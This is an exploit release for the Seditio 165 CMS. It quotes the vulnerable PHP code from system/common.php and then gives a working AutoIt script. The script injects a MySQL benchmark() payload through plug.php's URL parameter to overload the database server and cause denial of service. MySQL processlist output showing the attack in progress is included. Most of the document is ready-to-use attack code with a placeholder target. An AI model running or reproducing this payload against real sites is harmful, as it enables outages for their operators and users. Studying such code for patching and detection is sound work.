Seditio version 165 suffers from a remote SQL injection vulnerability that can cause a denial of service condition.
0ecddd84f6f2b1bfd4af0d4f383bec0702b6e6f09e70bbf849427b33b550fedd
#cs
Seditio 165 (from seditio-eklenti.com)
Denial Of Service exploit by AkaStep.
We will exploit Sql injection using this exploit and as result we will cause Denial of Service.
Mysql server will go down or will overloaded +server will get overloaded(High CPU Load).
// Vuln Discovered By AkaStep + exploit By AkaStep.
Enjoyyyyy)
NOTES Do not login to target site otherwise it will fail to exploit vuln.
Exploit Coded in Autoit.See autoitscript.com
Details about Vuln:(Magic_Quotes_gpc=off)
//seditio165 from seditio-eklenti.com
//magic_quotes_gpc =off
//system/common.php
// 0day by AkaStep
//Vulnerable code section
if (($rd_loc != "users.php")&&($rd_loc != "message.php"))
{
$sql_update_online = sed_sql_query("UPDATE sed_redirecter SET rd_location='".$rd_loc.$rd_extra."',rd_lastseen='".time()."' WHERE rd_ip='".$_SERVER["REMOTE_ADDR"]."'");
}
/14 April 2012
#ce
$targetsite="http://targetsite.tld/"; //target site. Change it to target site.
#cs
DO NOT TOUCH ANYTHING BELOW
#ce
$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit.
$first=$targetsite & '/forums.php'; // our 1'st request will go here.
HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun
InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit.
Sleep(1500); //sleeping 1.5 second (*Waiting operation*)
HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun.
InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service.
Exit; //exit from exploit
#cs
Here is how this process looks like from server's mysql:
worker.com is my own locally spoofed "site" it is not real site anymore.And it is nothing does in this case.
mysql> show full processlist \G
*************************** 4. row ***************************
Id: 5
User: sed165
Host: worker.com:1632
db: sed165
Command: Query
Time: 411
State: Updating
Info: UPDATE sed_redirecter SET rd_location='plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))
),rd_ip='192.168.0.1',rd_lastseen='',rd_lastseen='1334411851' WHERE rd_ip='192.168.0.1'
*************************** 5. row ***************************
Id: 6
User: root
Host: localhost:2658
db: sed165
Command: Query
Time: 0
State: NULL
Info: show full processlist
*************************** 6. row ***************************
Id: 7
User: sed165
Host: worker.com:1633
db: sed165
Command: Query
Time: 69
State: Waiting for table level lock
Info: UPDATE sed_redirecter SET rd_location='forums.php',rd_lastseen='1334412192' WHERE rd_ip='192.168.0.1'
6 rows in set (0.00 sec)
mysql>
+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^
#ce